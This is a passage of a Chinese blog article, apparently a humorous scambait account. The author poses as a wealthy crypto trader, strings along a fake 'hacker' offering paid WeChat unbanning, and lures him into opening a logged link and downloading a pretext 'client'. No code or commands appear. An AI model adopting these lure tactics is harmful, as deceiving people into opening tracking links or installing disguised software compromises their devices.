src="https://wechat2rss.xlab.app/img-proxy/?k=3d4984b7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhn23aMKkmd4dBGxnqsg0EnlyUP3EGvjWJE1BsZ3Z6Tzc4CR2qFrgYIuw%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">58</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">金牌黑客没有马上回复我，下午戴着AirPods听歌时，手机锁着屏Siri突然逐字念到：“<strong style="font-weight: bold;color: black;">金 牌 黑 客 私 信 了 你</strong>”，我整一个虎躯一震，一路小跑打开贴吧。（图不是特别相符，是那个意思）</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.7713365539452496" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=4f0f7c45&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhn7G7H3ibb6pZaasyAkDsGdU78VicV2Ngvjs04RdGC4LxszrAoA4iavscdA%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">59</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我诚恳的咨询金牌黑客能否帮我解封，金牌黑客欣然表示可以帮助我，还问我要张微信被封的图片，我去小红书搜了张发给他。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.45410628019323673" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=0717894d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnyq2UfSkYhYMEkDckRSGs2pcHE7rcfoG6paT0bTT3lkrQ4SqpoCTRJQ%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">60</figcaption></figure><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.7230273752012882" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=9d7d6680&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnk7cXoUaXg5b2Omhv0iaS5Iia8hZd47WX3INWtt51S2TCfsXEh2oRfX1A%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">61</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">趁机赶紧开始我的人设营造，一句话概括就是号太重要、我不差钱、我是玩儿币的。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.8301127214170693" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=39e29ffa&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnW8yIVLAtDjibrOo1qFC6QundSUDkUqAicxZPGOLtBfSxjuDIAZCBaOcg%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">62</figcaption></figure><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.8760064412238325" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=7cc59946&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnqocjpMlQ2otk8icQREQhebibiaqaRhgwrY2Gibrm4DdxazZhb9UhYBZZjg%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">63</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">金牌黑客说你别急（可能去搜1000u是什么单位去了），交完钱发我资料就能解封。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.8011272141706924" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=6d68275e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhn4epJWKvWdMVdAw9oicVfmSibFAptvVfxXvyVE9CHicNpfrvvYsePfzRhA%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">64</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">并且金牌黑客给出了业内统一标准的47分钟，彰显了业务的专业程度。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.037037037037037" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=b15319e0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnzedY77eu52F8xPxQdepOBRkI0KTTf9HGtkVZhDDiaJfTf6Ej8Dr5iaIw%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">65</figcaption></figure><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>效率换效率<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我问到那我怎么给你钱呢？金哥（后面统一简称金哥）说走平台收款QQ就行。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.3719806763285024" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=6a2c8986&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnceJHl9FGI00zH9ZRDjY8WDTVeJibFGSUemZGWpz6OalPUylw1Gk2FZA%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">66</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">然后，金哥说了一句特别特别有范儿的话，我当时看到后停顿了一分钟来反复品这句话。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">不知道你们15、16年那会儿跟没跟真正的娱乐圈（啥技术都不懂纯付款拉黑的那种）小学生、卡盟、收徒之类的人群打过交道，我觉得这句话真的是特别地道，<strong style="font-weight: bold;color: black;">这金哥是正黄旗老互联网啊</strong>。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.22481869460112813" data-s="300,640" style="" data-type="jpeg" data-w="1241" src="https://wechat2rss.xlab.app/img-proxy/?k=328e7fe5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhn1nG2NIoZ7wkzfPHnXCicUDJNo9J5ibnf8uyW3oiapD6GwpUNRfybWh54w%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">67</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">完事金哥发出了他的收款QQ，说微信暂时收不了款，<strong style="font-weight: bold;color: black;">《收 款 太 多 限 额 了》</strong>，说明生意很大。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.2020933977455717" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=69b63b0e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnKSFQdibvBtzlCphPD0dyRicTHcwMFHVm0kbDZMzkBWBW6uDHapMFPa6A%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">68</figcaption></figure><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.6191626409017713" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=52145a5e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnz2MIGQDraVgQ49qgCXA1dx665ooecS0sOkyXZWI0f2eibAWmicxPe0pQ%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">69</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我也不含糊，作为正星条旗老交易员，我特么可是个USDT王老五啊，我抬手就是两张资产秀肌肉图。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">并且直接放话，2000u以内都OK的，只要你办事，哥不差钱。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.076489533011272" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=98cf7ab8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhn4LzlD6qJQUbZw8iaDa7vlibKwibZYJUWhD3JxTx5OQ6GCefF4g2sMJq4g%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">70</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">金哥不想太麻烦，我只能一顿诉苦。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.3639291465378423" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=a974ed0a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnuzPReIgn6vRGyBj4OGAX9lOatyIDmKlkgOibmoNDa6gA4FD9cxkUQRg%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">71</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我估计金哥也没PP，不跟他拐弯抹角了，直接下饵。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.1867954911433172" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=08dc49ab&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnicaRzX6dBnTBlehIA2JUmb3E8zYA5ZEvZdsnwrdib0z0kLzaOET9tMtw%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">72</figcaption></figure><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.7528180354267311" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=4b7fce20&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnDxibuK5qMaH1sTgADxIXaCC3ib3S1TMHxY7oAbdibNKmINt3ZMVeymF5Q%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">73</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">金哥还是比天津小伙彳亍一些，直接就点开了。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">但是我特么一看log是iPhone的UA，难不成今天要空军？</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.1640625" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=ca1af77e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnOQibMbPce1euuHQJk4NFAib04JxHwnF10vNdXp6n4sPhvZtuAkIbNiaug%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">74</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">金哥不知道给谁学了点iPhone术语，让我给个苹果🍎的签？</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我赶紧说别啊，手机交易很危险的，你堂堂一黑客你用电脑不行么（此时我心里还是幻想着他好歹是坐在电脑前的）。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.7125603864734299" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=f93c59b9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnyCoicBAgjdW2SdPibeAXTO9TsM0FoNeIMsCStL8fCEjjhVK89UQkAlXw%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">75</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">金哥又使出生意很好战术，我只能假装华人无能狂怒。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.35829307568438" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=8758bbb1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnlpGRdjfNibWUOv7vdYxWIcoZy0QychfKJpMicQICxsPP9SZc7tqs0zsA%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">76</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">给他胡诌点专业术语唬一下</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.434782608695652" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=05f7e83a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnUgw0vXlSzWWRicUk1rLkU5q17Q7xMftNaYKASmBJ8pFCOzRH8nPfArQ%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">77</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我再次试探顺带激一下金哥，堂堂一个黑客没电脑？你用你的iPhone向赛博世界喊话嘛？</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">随手又扔出一张资产图，隔空向金哥喊话：“💰就在这里，你到底拿不拿啊？”</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.3655394524959743" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=b49099ae&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnEQibOcbCk0WfEKuv2zrZ5x6XdbAibR9l7hyfh12EJMeACKWGOcluH7cg%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">78</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">金哥开始试探性扯点别的，先稳住我。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我怕他不太懂U是啥，钩咬的不牢，给他科普下。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.6384863123993558" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=c8aa6eb6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnPqouOaONfSDdIP6lpLhYX1FbEfM4KykVibqnAoDibXpVfHzKnV5P8BibQ%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">79</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">金哥又试探我一下子，我一看你这不是欲就还推么，我反手一记欲擒故纵。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.313456889605157" data-s="300,640" style="" data-type="jpeg" data-w="1241" src="https://wechat2rss.xlab.app/img-proxy/?k=e36f752d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnrHK63rOYKMMCP2vicf41hS70DAyKabnPjsX8QVWAOA9F6sHFNr9UGNQ%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">80</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">金哥略急，我安抚一下子。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.34782608695652173" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=1f6ca3a7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhntNnSTCReN8aoMkibe7Cmzxcd07qr9agqryibV9XqhEkWRnuujiadAe2WA%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">81</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">金哥基本把钩含住了，说要上楼开电脑。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.6247987117552336" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=d2a1c568&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhngYiaQGX66tCickLfha1d5C6JW9VzwTg5gg6AiaXpKWuIgUj2PTADmBfLg%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">82</figcaption></figure><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.4565217391304348" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=9bea4ff8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnjDkfvMRlJ8kesQib9YRYRB18KAiaRcaD7bUW8TKpGfeFVLeKQKxLltxw%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">83</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我寻思就算是放学了去网吧开个机子也行啊，<strong style="font-weight: bold;color: black;">等他上楼等了二十多分钟，这B拿手机下了个欧易...</strong></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.4718196457326893" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=bb3110b9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnzqZLCksbLXEibdaAUp1Ce236JX93kA6Mslibiczyich7BQoz9xoK8Mnrtw%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">84</figcaption></figure><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.422705314009662" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=85f522ba&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnABLT4w9cEvH1uzsgSdyObiaiaaPYZr9BlviaKzTYfwDpiaibS8FPibpjzCUw%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">85</figcaption></figure><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.290660225442834" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=1d627636&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnPYZJVSt55AZk4pv5SXKLCdNlHj7mfT6k5ZrMoB24oTtLACiamdjEZ4Q%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">86</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我一看不太行，金哥看上去压根就没有电脑，我索性松下口把线稍微放长一点，同时心里基本已经认定他是个小学、初中生了。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.673107890499195" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=7652494d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhn0ccfz5ibe4gRScIOy0K4EQSh8Um76LlZWTwFc3iasw6svoiaNAkColHNA%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">87</figcaption></figure><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>外汇这块我是真不懂<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我嘱咐金哥可以提前下载客户端，一方面我可以假装不在线不回他消息，另一方面BTC那客户端确实会同步区块，我剧本也算前后呼应下。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.5040257648953301" data-s="300,640" style="" data-type="jpeg" data-w="1242" 